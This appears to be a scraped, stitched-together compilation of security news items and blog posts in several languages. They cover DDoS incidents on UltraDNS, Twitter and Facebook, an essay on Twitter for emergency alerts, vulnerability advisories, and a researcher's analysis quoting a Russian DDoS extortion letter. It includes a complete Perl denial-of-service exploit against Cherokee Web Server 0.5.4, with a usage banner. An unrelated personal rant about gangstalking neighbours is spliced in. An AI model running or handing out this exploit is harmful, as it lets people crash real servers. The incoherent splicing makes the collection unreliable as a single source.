A denial of service (DDoS) attack Wednesday on the servers of DNS provider UltraDNS took out several major websites, including retailer Amazon, for almost an hour on Wednesday. The company provides DNS services for Amazon, Wal-Mart, Expedia, and a host of other sites, and the attack rendered these sites unreachable even though they were not attacked directly.

Of course, this attack is even more noteworthy considering it came during the waning days of the holiday shopping season, and likely put a brief kink in the shopping plans of a few last minute shoppers.

The attack occurred at around 4:45pm Pacific time, and was directed at Neustar’s servers (the owners of UltraDNS) in Palo Alto and San Jose, Calif. Neustar was able to detect it quickly and counter it somewhat, lessening the overall impact. Even so, websites served by either company became unusable for much of that hour until the attack subsided. Most sites were back to normal by 6:00pm.

Some are suggesting the attack may have been more widespread: other sites that are not serviced by UltraDNS were said to be experiencing problems as well, including the online game Second Life.

İlk Windows7 açığı Microsoft tarafından kabul edildi. Bu bir denial of service(DoS) açığı olup Windows7′yi ve Windows Server 2008 R2′yi sonsuz döngüye sokup kilitleyebiliyor. Böylece kullanıcı kontrolü tekrar ele alabilmek için manuel olarak bilgisayarını yeniden başlatmak zorunda kalıyor.

Microsoft bu açık için bir yama yayınlanacağının henüz kesin olmadığını duyurdu. Yama çıkana dek kullanıcılar bu açıtan korunmak için 139 ve 445 nolu portlarını bloklayabilirler. Ancak bu web tarayıcıları, ağ üzerinden dosya paylaşımını ve diğer servisleri kullanılmaz kılacağından çok da uygulanabilir bir yöntem olarak gözükmüyor.

Kaynak: http://computerworld.co.nz/news.nsf/scrt/E9592E1A9719742ACC25766F0066B38D

Si eres usuario de Kaspersky Antivirus 2010 te interesará saber que se ha descubierto una vulnerabilidad en Kaspersky Anti-Virus 2010, que puede ser explotada por usuarios locales maliciosos para provocar un DoS (Denial of Service).

La vulnerabilidad se debe a un error en el controlador kl1.sys al manipular IOCTL. Esto puede ser explotado para eliminar la referencia de memoria no válida y causar un “crash” a través de un núcleo especialmente diseñado 0×0022C008IOCTL.

La vulnerabilidad está confirmada en la versión 9.0.0.463. Otras versiones también pueden verse afectadas.

SOLUCIÓN: Actualizar a la versión 9.0.0.736.

DNS Problem Linked to DDoS Attacks Gets Worse: “ISPs are distributing consumer modems that could be used in DDoS attacks, researchers say.

“

(Via PC World Latest Technology News.)

Trick or Tweet? That question is not intended to remind you of what you hear on Halloween, when your neighbor’s kid knocks on your door and asks the annual question with a lisp.

We recently finished Halloween shenanigans, where kids disguise themselves as fictional characters and knock on doors in their neighborhood, traditionally asking if you’d like to give them a treat or risk a less enjoyable alternative. The question raised in this post, however, is whether use of social media, and Twitter in particular, is a bit of the same situation. Is Twitter being touted as a viable emergency notification system when it is not fit for that important purpose? A companion question might be whether we, as customers (i.e. The “Twitterati”), are putting pressure on this social media channel to transform itself into something for which it was not originally intended.

Many schools may start using social media channels, such as Twitter and Facebook as a more regular part of their emergency notification program. A variety of vendors are coming up with way to make this happen.

In a move that plenty of other institutions are sure to follow, Oregon’s Pacific University has integrated its emergency notification system with the popular social networking sites Facebook and Twitter. The move allows the 3,100-student university to send emergency messages to students via e-mail, RSS feed, or text message to mobile phones, Blackberries, wireless PDAs, pagers, and smart or satellite phones–and now Twitter or Facebook.

The university subscribes to an emergency notification system from Omnilert’s e2Campus that allows administrators to send a single message to a designated list of recipients on a variety of devices and in various formats. In November, e2Campus added Twitter and Facebook as options–and Pacific University was the first institution to jump on board.

University Links Twitter, Facebook with Notification System

My last post, Did Twitter Replace Cell Phones for Ft. Hood Shooting News?, mentioned that even the military recommended Twitter as an emergency information source, when a sudden surge in emergency traffic crashed the civilian cell phone system in the Ft. Hood area. As a country, the United States has been blessed with fewer natural disasters than many countries. Clearly, we are still trying to digest the disaster preparedness and recovery lessons from far-reaching events like hurricane Katrina, which likewise disrupted cell phone traffic in a number of ways. Is Twitter any better?

Matt Williams, Assistant Editor of Government Technology Magazine, posted an interesting article, mentioning some of the many uses the U.S. government is making of Twitter:

When Twitter’s founders launched the service in 2006, they advertised it as a way to keep abreast of friends’ everyday lives. The idea of “tweeting” in short bursts about mundane details – “I’m watching Dancing with the Stars!” – may seem narcissistic, or pointless. But a loyal following has found novel and unexpected applications for the service. This movement includes government agencies, which are use Twitter for various functions, such as real-time alerts about emergencies, election results and even science projects.

The most practical government applications for Twitter are in public safety and emergency notification. For example, the Los Angeles Fire Department (LAFD) updates its Twitter page with bulletins about structural fires, the number of responding firefighters, and injuries and casualties. A typical post is something like: “12126 Burbank Bl* No ‘formal’ evacuations; Firefighters maintaining 500′ exclusion zone pending LAFD Hazmat arrival…”

“The question really would be, why not do Twitter?” asked Bill Greeves, the county’s IT director. “It is 140 characters, so granted, you are limited in the message you put on there. But we’re not creating content for Twitter; we’re creating content to send out a message to the public, and we’re just taking advantage of the latest and greatest channels available.”

The beauty of it, Greeves said, is that if something better replaces Twitter or it all falls out of vogue, it won’t hurt the bottomline.

Governments use Twitter for Emergency Alerts, Traffic Notices and More

Williams’ article notes that one of the major hurdles to greater government use of Twitter may be “viewership,” but it appears even the U.S. State Department has taken note of Twitter’s potential use in an international context. An article by Lev Grossman, Iran Protests: Twitter, the Medium of the Movement, points out:

The U.S. State Department doesn’t usually take an interest in the maintenance schedules of dotcom start-ups. But over the weekend, officials there reached out to Twitter and asked them to delay a network upgrade that was scheduled for Monday night. The reason? To protect the interests of Iranians using the service to protest the presidential election that took place on June 12. Twitter moved the upgrade to 2 p.m. P.T. Tuesday afternoon — or 1:30 a.m. Tehran time.

So what exactly makes Twitter the medium of the moment? It’s free, highly mobile, very personal and very quick. It’s also built to spread, and fast. Twitterers like to append notes called hashtags — #theylooklikethis — to their tweets, so that they can be grouped and searched for by topic; especially interesting or urgent tweets tend to get picked up and retransmitted by other Twitterers, a practice known as retweeting, or just RT. And Twitter is promiscuous by nature: tweets go out over two networks, the Internet and SMS, the network that cell phones use for text messages, and they can be received and read on practically anything with a screen and a network connection.

This makes Twitter practically ideal for a mass protest movement, both very easy for the average citizen to use and very hard for any central authority to control. The same might be true of e-mail and Facebook, but those media aren’t public.

This use of Twitter in a mass crisis has apparently not gone without notice at headquarters. Twitter co-founder, Evan Williams, in comments to the BBC about the Iran-related maintenance delay said:

“We did it because we thought it was the best thing for supporting the information flow there at a crucial time, and that’s kind of what we’re about – supporting the open exchange of information.

“So it seemed like the right thing to do.”

Twitter Iran delay ‘not forced’

Is Twitter the new boss in social media town? Even networks like LinkedIn seem to be trying to attach themselves to it, as Taylor Singletary points out in his article on the LinkedIn blog, You want Tweets? There’s an App for that…:

As you’ve likely heard by now, we launched our first Twitter integration features at LinkedIn earlier this week.  For professionals who want to make Twitter part of their professional identity, you can now easily add your Twitter account to your LinkedIn profile, and seamlessly post LinkedIn status updates to Twitter, and vice-versa.

This launch also brings with it a brand new addition to the LinkedIn application platform: Tweets.

Tweets is an application that allows you to seamless integrate basic Twitter functionality into your LinkedIn experience.

Twitter itself, however, is not immune from interruption of service. Last August, it was the subject of an apparent denial of service attack. Eliot Van Buskirk’s article on Wired gives a nice outline of the event:

Twitter was shut down for hours Thursday morning by what it described as an “ongoing” denial-of-service attack, silencing millions of Tweeters. It was the first major outage the service has suffered in months and possibly the first ever due to sabotage. The outage appeared to begin mid-morning, EST, and affected users around the world. After about three hours, the service was coming back online in fits and starts.

In a denial-of-service attack, a malicious party barrages a server with so many requests that it can’t keep up, or causes it to reset. As a result, legitimate users can only access the server very slowly — or not at all, as appears to be the case here.

Not only was the site down, but client applications that depend on the Twitter API could also not connect to the service, creating a complete Twitter blackout. According to June ComScore numbers Twitter has more than 44 million registered users and its user base has been growing rapidly for months as it becomes better known in the mainstream.

Denial-of-Service Attack Knocks Twitter Offline

Twitter’s statement was, of course, less verbose:

We are defending against a denial-of-service attack, and will update status again shortly.

Update: the site is back up, but we are continuing to defend against and recover from this attack.

Update (9:46a): As we recover, users will experience some longer load times and slowness. This includes timeouts to API clients. We’re working to get back to 100% as quickly as we can.

Update (4:14p): Site latency has continued to improve, however some web requests continue to fail. This means that some people may be unable to post or follow from the website.

Ongoing denial-of-service attack

Some, such as Roberta Whitty, a member of the Gartner blog network, clearly feel it dangerous for organizations to rely upon Twitter:

The denial of service attack on Twitter should remind organizations that are automating their emergency call trees and crisis communications that a single end point isn’t good enough. Given the growth in social networking, more and more organizations are starting to think about leveraging these sites for emergency/crisis communications. But if it becomes your only end point, you risk not getting your message out when it is most needed – during a disaster.  In addition, no national telcom network has been tested for a regional disaster, so your phone messages might not get delivered either. Hence, build for emergency notification around multiple channels for best coverage. What is your organization doing to support best coverage?

Don’t Rely Only on Twitter for Emergency Notification

One must also wonder how the continuous barrage of scams might impact use of any form of social media as an emergency notification system. Michael Arrington’s article, Facebook To Increase Enforcement Of Anti-Scam Rules, points out:

Facebook says that deceptive ads are a widespread problem on the Web…

Anyone who doesn’t engage in scammy behavior right now is at a monetization disadvantage. There are real similarities between this issue and steroid use in baseball. As long as the MLB didn’t really enforce steroid use among players, it was a competitive necessity to take the drugs, and so many more players took them than otherwise would.

We know that companies such as Microsoft are the target of frequent attacks by hackers. Some of these may have gained insider knowledge as employees of their targets and are thus extraordinarily effective in their destructive efforts. How could any governmental entity, however, think it might be less likely to attract detractors?

Referring to last Augusts’ attacks against both facebook and Twitter, Ryan Singel’s article noted:

They don’t make any sense.

“I’m afraid two outliers make a line and there is something going on… We have entered the third generation of denial of service attacks, and anyone that plans on the rationality of criminals is at risk.”

What does that mean? It means if you make the assumption that the bad guys online are just a new breed of bank robbers, that can get you into trouble if there are a few sociopaths mixed in.

The ongoing attacks Thursday on Facebook and the micro-publishing site Twitter likely involve tens of thousands of compromised computers under the control of a single person. Likely the attack involves asking the sites to serve up a page of search results, or some other processor-intensive requests. That makes it hard to determine if the request is a real user action or a malicious fake.

Is There Rhyme or Reason to the Attacks on Twitter?

As the title of another of Ryan Singel’s articles tells us:

Security experts say the attacks on Twitter and Facebook are nothing new under the sun and that Distributed Denial of Service Attacks — which render a web server useless to real users by overwhelming the server with fake requests, are commonplace on the net. DDoS (pronounced dee-daas) attacks are usually carried out using a zombie army of infected Windows computers known as a botnet, where the controller tells the infected computers what site to bombard with requests.

“This kind of stuff happens every day, but when it happens on Twitter, people don’t know what to do with their thumbs,” said Paul Ferguson, a senior threat researcher for security giant Trend Micro.

And so far there’s nothing to indicate there’s anything particularly interesting about the attack from a technical perspective, according to security expert Tom Byrnes, the founder of ThreatStop, a network security company.

“Taking something down on the web is garden variety vandalism,” Byrnes said. “They aren’t doing anything new … someone has a botnet and they are just pounding on Twitter and Facebook.”

Twitter, Facebook Attacks No Surprise to Security Experts

So how do we reconcile these events? The government is recommending use of social media channels for emergency notification purposes. Schools and other organizations are rapidly adopting it as a significant part of their own emergency systems. At the same time, however, disgruntled employees and political activists are focusing their efforts at bringing down these emerging communication giants, and are doing so with amazing success.

If a single hacker can bring down the Twitter and Facebook networks, what damage could be done by a terrorist organization or, perhaps one of the many rogue nations we face in our global village? We can certainly hope these social media moguls will learn their lesson from these attacks and spend more of their effort on making these networks secure. We also know that, historically, the hackers often seem to be at least one step ahead of law enforcement, network security experts, and others upon whom we rely for protection.

We have likewise read stories about illegal probing of military and infrastructure networks, including those designed to make our nuclear facilities secure. Might we not anticipate that at least some of this probing may be leading up to attempts at breaching the defenses being tested. Sure, some of this may just be teens with too much computer time on their hands, or political dissidents whose focus in on something other than world destruction. On the other hand, are we setting ourselves up for the big bang by increasing our reliance upon social media for emergency news, rather than what this media was intended for originally?

That’s what I think. Please leave a comment and let us know what you think.

If you are really interested, I just started yet another free group on LinkedIn, Social Media Search and Forensics. Many of these articles and discussion about them are posted there. Please join us.

Provided by CommunityDNS, the information in this post consists of news items in the security-based Internet community.

Vendors Scrambling to Fix Bug in Net’s Security

SSL (Secure Sockets Layer) is widely known as the indicator that, when invoked, ensures users their session is encrypted and the contents being transmitted is secure. The security protocol is used highly in e-commerce applications.

Recent discoveries have pointed out the vulnerabilities associated with SSL and that it is not as secure as one may think.

While there have been bugs that have dealt with the management of the SSL’s digital certificates, this flaw is with the protocol itself.

Subject to the vulnerability are shared hosting environments, databases, mail servers, and other secure applications. Fixes will need to be applied to Web browsers, Web load balancers, Web servers, mail servers, ODBC drivers, SQL servers and peer-to-peer protocols.

Click here for more information.

Cybercriminals down five British police forces in a year

With nearly all of police daily operations depending on IT systems, five British police forces have been impacted by cybercriminals. The Internet attacks of the respective police forces caused outages lasting three or more days. It is unclear if any date was lifted through the five different breaches.

Click here for more information.

Swedish spooks knocked offline by hack attack

Thought to be an attack due to Sweden’s new law allowing the country’s intelligence agency, FRA, to monitor all Internet traffic coming through the country. The outage began Monday night, lasting until Thursday morning.

An apparently separate denial-of-service attack was aimed at police and media outlets.

Click here for more information.

EU offers hope to file-sharers

In an amendment applied to a larger telecoms bill verbiage regarding action against illegal file-sharers was watered down. Fearing that basically declaring the internet as a fundamental right for its citizens would conflict with how to go after illegal file-sharers, the Commission watered down the language giving ultimate responsibility to the member states on policing illegal content downloaders.

Click here for more information.

Researchers from MIT and UC San Diego recently demonstrated an attack against Amazon’s EC2 where an attack virtual machine can launch attacks against a victim virtual machine that is located on the same physical server.

Does this mean that there is a security vulnerability within EC2? Yes.

Should you be concerned? Not really.

Read more .. ..

Pricing Scheme for a DDoS Extortion Attack: ”

With the average price for a DDoS attack on demand decreasing due to the evident over-supply of malware infected hosts, it should be fairly logical to assume that the ‘on demand DDoS’ business model run by the cybercriminals performing such services is blossoming.

Interestingly, what used to be a group that was exclusively specializing in DDoS attacks, is today’s cybercrime enterprise ‘vertically integrating‘ in order to occupy as many underground market segments as possible, all of which originally developed thanks to the ‘malicious economies of scale’ (massive SQL injections through search engines’ reconnaissance, standardizing the social engineering process, the money mule recruitment process, diversifying the standardized and well proven propagation/infection vectors etc.) offered by a botnet.

What if their DDoS for hire business model is experiencing a decline? Would penetration pricing save them? What if they start enforcing a differentiated pricing model for their services through DDoS extortion?

Let’s discuss one of those groups that’s been actively attempting to extort money from Russian web sites since the middle of this summer. From penalty fees, to 30% discount if they want to request DDoS for hire against their competitors, a discount only available if they’ve actually paid the 10,000 rubles monthly extortion fee at the first place – this gang is also including links to the web sites of Russian’s Federal Security Service (FSB) and Russia’s Ministry of the Interior stating ‘in order to make it easy for the victims to contact law enforcement‘.

Sample DDOS extortion letter:
‘Hello. If you want to continue having your site operational, you must pay us 10 000 rubles monthly. Attention! Starting as of DATE your site will be a subject to a DDoS attack. Your site will remain unavailable until you pay us.

The first attack will involve 2,000 bots. If you contact the companies involved in the protection of DDoS-attacks and they begin to block our bots, we will increase the number of bots to 50 000, and the protection of 50 000 bots is very, very expensive.

1-st payment (10 000 rubles) Must be made no later than DATE. All subsequent payments (10 000 rubles) Must be committed no later than 31 (30) day of each month starting from August 31. Late payment penalties will be charged 100% for each day of delay.

For example, if you do not have time to make payment on the last day of the month, then 1 day of you will have to pay a fine 100%, for instance 20 000 rubles. If you pay only the 2 nd date of the month, it will be for 30 000 rubles etc. Please pay on time, and then the initial 10 000 rubles offer will not change. Penalty fees apply to your first payment – no later than DATE’

Payment must be done on our purse Yandex-money number 41001474323733. Every month the number will be a new purse, be careful. About how to use Yandex-money read on www.money.yandex.ru. If you want to apply to law enforcement agencies, we will not discourage you. We even give you their contacts: www.fsb.ru, www.mvd.ru‘

It’s also worth pointing out that a huge number of ’boutique vendors’ of DDoS services remain reluctant to initiate DDoS attacks against government or political parties, in an attempt to stay beneath the radar. This mentality prompted the inevitable development of ‘aggregate-and-forget’ type of botnets exclusively aggregated for customer-tailored propositions who would inevitably get detected, shut down, but end up harder to trace back to the original source compared to a situation where they would be DDoS the requested high-profile target from the very same botnet that is closely monitored by the security community.

The future of DDoS extortion attacks, however, looks a bit grey due the numerous monetization models that cybercriminals developed – for instance ransomware, which attempts to scale by extorting significant amounts of money from thousands of infected users in an automated and much more efficient way than the now old-fashioned DDoS extortion model.

Related posts:
Botnet Communication Platforms
Custom DDoS Capabilities Within a Malware
A New DDoS Malware Kit in the Wild
Botnet on Demand Service
The DDoS Attack Against CNN.com
A Botnet Master’s To-Do List
Custom DDoS Attacks Within Popular Malware Diversifying
Using Market Forces to Disrupt Botnets
Web Based Botnet Command and Control Kit 2.0
DDoS Attack Graphs from Russia vs Georgia’s Cyberattacks
The DDoS Attack Against Bobbear.co.uk
Russian Homosexual Sites Under (Commissioned) DDoS Attack

This post has been reproduced from Dancho Danchev’s blog.

“

(Via Dancho Danchev’s Blog – Mind Streams of Information Security Knowledge.)

Nuevas variantes en vulnerabilidades que afectan al servidor Apache.

Apache APR-util ‘apr_strmatch_precompile()’ Integer Underflow Vulnerability

Apache APR-util ‘xml/apr_xml.c’ Denial of Service Vulnerability

Apache APR-util ‘apr_brigade_vprintf’ Off By One Vulnerability

fuente: securityfocus.com

As of October 31st, 2009, the attackers were DDoSing InBoxRevenge website again. This is where the IBR anti-spam forum is hosted, though the content is definitely offline at this time.

Early morning 11/1/09 it was reported by @themarkgiles Twitter user that IBR was under a flood attack from 750 bot IPs at a rate of 50/second. Source IP countries: TH (Thailand), IN (India), BD (Bangladesh), RU (Russia), BR (Brazil), PH (the Philippines), etc.

The spammers are hitting the IBR website with IPs that are compromised and under control of a botnet. Obviously some spammer is not happy with the reporting we do of  cybercriminal activities.

We will continue to post more information as it comes available.

UPDATE on 11/1/09

Taken from the most recent IBR Blogspot entry:

Good news — DDoS attacks not over

Members may have noticed another recent outage for several hours. It was another confirmed DDoS, via a method called “syn flood.” In the past, these sorts of attacks have gone on for weeks. We just roll with it.

Why is it good news? It lets us know our efforts are worthwhile, because making internet crime less profitable is exactly what we’re trying to accomplish. If we weren’t making criminals want to attack us, we’d have to wonder what we were doing wrong. We never expect to achieve the amazing level of spammer ire that Blue Security suffered in its famous 2006 attack, but then we aren’t planning to try to keep the site on line during the attacks. We just fall back to the alternate methods of spreading information. If our attackers would like to try to simultaneously take down Google, Microsoft, Twitter, WordPress, and all the other sites we’ve established a presence on, they’ll get themselves a lot more law enforcement attention than they’re currently planning on.

Comments are open for this blog, though they have to be approved by a moderator. And if you have a comment that seems to merit its own “thread,” we can repaste it as a blog post that can get its own comments.

Remember that SiL also has his two blogs, which also accept moderated comments:
http://ikillspammers.blogspot.com
http://spamitmustfall.blogspot.com

And we have our other sites for announcements:
http://twitter.com/inboxrevenge
http://inboxrevenge.webs.com
http://inboxrevenge.blogspot.com
http://spamtrackers.org
http://inboxrevenge.spaces.live.com

As always, the best response to retaliation is to continue to do the reporting you were doing before — but to do more of it.  At the time of this post update, the IBR website loads as a 403 error as of 18:00 GMT on 11/1/09.

Inboxrevenge.com, the little forum that creates big headaches for internet criminals, is under another distributed denial of service (DDoS) attack. That means hundreds or thousands of zombie computers — computers like yours that have been infected by malware and put under the control of criminals — are all trying to access the site simultaneously. Websites can only handle a certain amount of traffic, so having so many requests going on continuously shuts out legitimate visitors.

Frankly, we were wondering what took them so long. We’ve been through this before. We’ve got lots of backup means for forum admins and mods to communicate with each other and with the other members.  We are prepared to just let the site be off line while these guys spend their money attacking. We’ll just chill and spend the extra time reporting their domains and bots. The difference is they don’t get to read about it.

What the rest of our members can do is take extra time reporting. Report your spam emails to spamcop.net, so more of their IPs are blocklisted and more of their bots are disinfected.  Fire up Complainterator and report domains and their nameservers to registrars. We are not some discrete target that can be shut down with a DDoS. We are our members, all over the world, and we’re in it for the long term.

Check out our other websites online for updates:

http://twitter.com/inboxrevenge
http://inboxrevenge.webs.com
http://inboxrevenge.blogspot.com
http://spamtrackers.org
http://inboxrevenge.spaces.live.com

#######################################################
#
# Name : Cherokee Web Server 0.5.4 Denial Of Service
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website:  Xc0re.net
# DATE: 25/10/09
# Tested on Windows !
#######################################################

Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]

[*] Download Page : http://www.cherokee-project.com/download/windows/

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Description : By sending a crafted GET request [GET /AUX HTTP/1.1] to the server , the server crashes !

[*] Exploitation :

#!/usr/bin/perl
# Cherokee Web Server 0.5.4 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [25/10/09]

$host = $ARGV[0];
$PORT = $ARGV[1];

$packet = “AUX”;

$stuff = “GET /”.$packet.” HTTP/1.1\r\n” .
“User-Agent:Bitch/1.0 (Windows NT 5.1; U; en)\r\n” .
“Host:127.0.0.1\r\n”.
“Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n”.
“Accept-Language: en-US,en;q=0.9\r\n”.
“Accept-Charset: iso-8859-1,*,utf-8\r\n”.
“Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n\r\n”;

use IO::Socket::INET;
if (! defined $ARGV[0])
{
print “+========================================================+\n”;
print “+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n”;
print “+ Author [Usman Saeed] +\n”;
print “+ Company [Xc0re Security Research Group] +\n”;
print “+ DATE: [25/10/09] +\n”;
print “+ Usage :perl sploit.pl webserversip wbsvrport +\n”;
print “+ Disclaimer: [This code is for Educational Purposes , +\n";
print "+ I would Not be responsible for any misuse of this code]+\n”;
print “+========================================================+\n”;

exit;
}

$sock = IO::Socket::INET->new( Proto => “tcp”,PeerAddr => $host , PeerPort => $PORT) || die “Cant connect to $host!”;
print “+========================================================+\n”;
print “+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n”;
print “+ Author [Usman Saeed] +\n”;
print “+ Company [Xc0re Security Research Group] +\n”;
print “+ DATE: [25/10/09] +\n”;
print “+ Usage :perl sploit.pl webserversip wbsvrport +\n”;
print “+ Disclaimer: [This code is for Educational Purposes , +\n";
print "+ I would Not be responsible for any misuse of this code]+\n”;
print “+========================================================+\n”;

print “\n”;

print “[*] Initializing\n”;

sleep(2);

print “[*] Sendin DOS Packet \n”;

send ($sock , $stuff , 0);
print “[*] Crashed \n”;
$res = recv($sock,$response,1024,0);
print $response;

exit;

The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to cause the affected kernel to stop responding, denying service to legitimate users.

Linux kernel 2.6.31.4 is vulnerable; other versions may also be affected.
Published:     Oct 19 2009 12:00AM
Updated:        Oct 19 2009 07:38PM

REFERENCIA DE LA VULNERABILIDAD

fuente: securityfocus.com

Their feedback to me. How dare they, disgusting filth of the earth. This came after I was looking at rental accomodations around Australia on my computer.  Its only been a few days since they totally crashed my computer, and stuffed around with my phone also.

Its just after 3am, at about 2.51 am, I heard a noise in the ceiling, about half a minute after that started to have trouble breathing and my hands and feet started to swell, then heard the usual footsteps from no 16, next door,  going down the passage the taste is like insecticides.  Their will be bugs running around soon, there always is not long after this.

Going back a few days ago I was out weeding my lawn, when the neighbour from next door came home with a friend of hers, as they walked from the car to their door the friend says to her as she looks my way “Have you got someone up your bum”.   I feel very sorry for her if thats the case and really feel she should seek some kind of medical treatment, as is a nasty way to spread aids,  but besides that,  I don’t ask anyone if I can sit in my own front yard.  I put that on for a reason, not long after the above was done at 2.50  got “I’m going to come and f**k  you up the b*m.”  and “Got you good that time you slut”.  How totally cheap and vulgar this kind of trash is.  As for being a slut? I don’t  have different men sleeping at my place week on week off.  Take a plane ride somewhere else, preferably somewhere radical.  Yes they will definately know what I mean by that.  While your at it honey give him a hug and put him on a diet, he could really use it.

About three weeks ago, they stole one of my email addresses, I was lucky I got it back after 3 days. About a week after that I got an email from paypal that there were a few computers connected to my IP address and trying to log into my paypal account.  A few days after that, they said “Targets can’t make any money”. The next  day my computer was crashed. Nothing on it, they removed  my windows and all. I got the computer back from the technician a few days ago, to use it is bloody unreal, it reminds me of my phone services years ago, non bloody existant. While the computer was away, the phone was also attacked again, there was no dial tone on it.  My ebay account as a seller for my miniatures, art, since being hacked and crashed is also non-existent.  I was building up a following, and coasting along ok, since that day, nothing.

Targets can’t make money?  Who the fuck do these inbred idiots think they are, go eat with your toes.

Since 1986, this pathetic “dirtbag” to send it back to the right place, has been on my phone services and now internet connection.  Must be so good to be able to do this and neither telecom or the police will do anything about you. Wow, what do you do to be able to get away with  this?  Must be cheap,  whatever. So glad the rest of the public doesn’t have to sink to your level also.

Whats the dirty little secret? What do we have to do to be able to get away with it and NO repraisal, besides being a filthy little gangstalker?  No,  even if I can’t get anything done within the law, don’t want your way.

You torture animals, kill people, and bloody get away with it,  What happened to this country.

Bitbucket’s Amazon DDoS – what went wrong: “Bitbucket’s Amazon DDoS – what went wrong”

(Via The Register.)